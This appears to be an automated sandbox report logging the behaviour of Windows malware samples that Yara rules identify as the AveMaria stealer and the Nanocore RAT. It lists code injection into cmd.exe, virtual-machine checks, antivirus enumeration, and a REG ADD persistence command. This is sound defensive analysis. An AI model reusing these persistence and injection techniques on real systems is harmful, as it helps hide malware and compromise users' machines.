Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\images.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 662
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Window / User API: threadDelayed 6638
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Window / User API: threadDelayed 2297

Source: C:\ProgramData\images.exe

Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe TID: 1064	Thread sleep time: -42849s >= -30000s
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe TID: 5728	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe TID: 2528	Thread sleep count: 70 > 30
Source: C:\ProgramData\images.exe TID: 5560	Thread sleep time: -46689s >= -30000s
Source: C:\ProgramData\images.exe TID: 4840	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\images.exe TID: 3448	Thread sleep count: 70 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 5036	Thread sleep count: 662 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 5036	Thread sleep time: -7944000s >= -30000s
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe TID: 992	Thread sleep time: -38920s >= -30000s
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe TID: 4784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe TID: 1320	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 2736	Thread sleep time: -46806s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 720	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00411446 FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Thread delayed: delay time: 42849
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\images.exe	Thread delayed: delay time: 46689
Source: C:\ProgramData\images.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Thread delayed: delay time: 38920
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 46806
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: images.exe, 00000016.00000002.474849931.0000000000E2B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWHh
Source: images.exe, 00000016.00000002.474949211.0000000000E50000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oyGG
Source: reg.exe, 0000000B.00000002.252269957.0000000002E30000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.483465858.0000000006DD0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: images.exe, 00000016.00000002.474949211.0000000000E50000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: images.exe, 00000016.00000002.475068084.0000000000E83000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:OO3
Source: images.exe, 00000016.00000003.309020359.0000000000E50000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: reg.exe, 0000000B.00000002.252269957.0000000002E30000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.483465858.0000000006DD0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 0000000B.00000002.252269957.0000000002E30000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.483465858.0000000006DD0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Xjf4yH9N2t.exe, 00000007.00000003.251342778.0000000000FDE000.00000004.00000001.sdmp, images.exe, 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: images.exe, 00000016.00000002.475068084.0000000000E83000.00000004.00000020.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: reg.exe, 0000000B.00000002.252269957.0000000002E30000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.483465858.0000000006DD0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\system32\drivers\tsusbhub.sys

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00426222 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_0041EB27 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00411B38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00411B3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00411E6D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 24_2_001F001A mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00406045 GetProcessHeap,RtlAllocateHeap,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process token adjusted: Debug
Source: C:\ProgramData\images.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\ProgramData\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 1F0000 protect: page execute and read and write
Source: C:\ProgramData\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 660000 protect: page read and write

Contains functionality to inject threads in other processes

Show sources

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Code function: 7_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\ProgramData\images.exe

Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 1F010E

Writes to foreign memory regions

Show sources

Source: C:\ProgramData\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 1F0000
Source: C:\ProgramData\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 660000

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe 'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe'
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Process created: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,

Source: images.exe, 00000016.00000002.474949211.0000000000E50000.00000004.00000020.sdmp	Binary or memory string: Program Manager
Source: KetqqsbuJ.exe, 00000028.00000002.479588850.00000000030AE000.00000004.00000001.sdmp	Binary or memory string: Program ManagerH
Source: images.exe, 00000016.00000002.475259759.0000000001490000.00000002.00000001.sdmp, cmd.exe, 00000018.00000002.476330186.0000000003400000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.478630114.0000000002EA3000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: images.exe, 00000016.00000002.475259759.0000000001490000.00000002.00000001.sdmp, cmd.exe, 00000018.00000002.476330186.0000000003400000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.475765757.00000000014D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: images.exe, 00000016.00000002.475259759.0000000001490000.00000002.00000001.sdmp, cmd.exe, 00000018.00000002.476330186.0000000003400000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.475765757.00000000014D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: KetqqsbuJ.exe, 00000028.00000002.483732291.00000000074EC000.00000004.00000001.sdmp	Binary or memory string: Program Manager@@x
Source: KetqqsbuJ.exe, 00000028.00000002.482420960.0000000005C1A000.00000004.00000001.sdmp	Binary or memory string: Program Managerram Manager
Source: KetqqsbuJ.exe, 00000028.00000002.483706311.00000000073AC000.00000004.00000001.sdmp	Binary or memory string: ulProgram Manager
Source: images.exe, 00000016.00000002.475259759.0000000001490000.00000002.00000001.sdmp, cmd.exe, 00000018.00000002.476330186.0000000003400000.00000002.00000001.sdmp, KetqqsbuJ.exe, 00000028.00000002.475765757.00000000014D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: KetqqsbuJ.exe, 00000028.00000002.482674777.000000000609B000.00000004.00000001.sdmp	Binary or memory string: Program Managerram Manager
Source: images.exe, 00000016.00000002.480389563.0000000003E0E000.00000004.00000001.sdmp	Binary or memory string: RProgram Manager%
Source: images.exe, 00000016.00000002.472620170.0000000000559000.00000040.00000001.sdmp	Binary or memory string: C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_10.17.46{Program Manager}
Source: images.exe, 00000016.00000002.481006617.0000000004240000.00000040.00000001.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00410E5E cpuid

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Queries volume information: C:\Users\user\Desktop\Xjf4yH9N2t.exe VolumeInformation
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\images.exe	Queries volume information: C:\ProgramData\images.exe VolumeInformation
Source: C:\ProgramData\images.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\images.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\images.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\images.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connection per server for Internet Explorer

Show sources

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 22.2.images.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Xjf4yH9N2t.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.images.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5264629.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.KetqqsbuJ.exe.5260000.20.unpack, type: UNPACKEDPE
